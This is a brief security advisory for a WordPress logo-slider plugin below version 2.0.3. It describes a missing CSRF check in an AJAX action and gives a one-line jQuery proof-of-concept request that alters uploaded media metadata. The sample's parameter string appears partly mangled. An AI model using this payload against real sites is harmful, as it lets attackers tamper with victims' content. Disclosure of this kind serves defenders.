The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.
jQuery.post(ajaxurl,{ action: “lswss_save_attachment_data”, attachment_id: 564, form_data: “lswss_attachment_title=Test&lswss;_attachment_desc=Changed%20via%20CSRF&lswss;_attachment_alt=Alt%20text&lswss;_attachment_link=” })
CPE | Name | Operator | Version |
---|---|---|---|
logo-showcase-with-slick-slider | lt | 2.0.3 |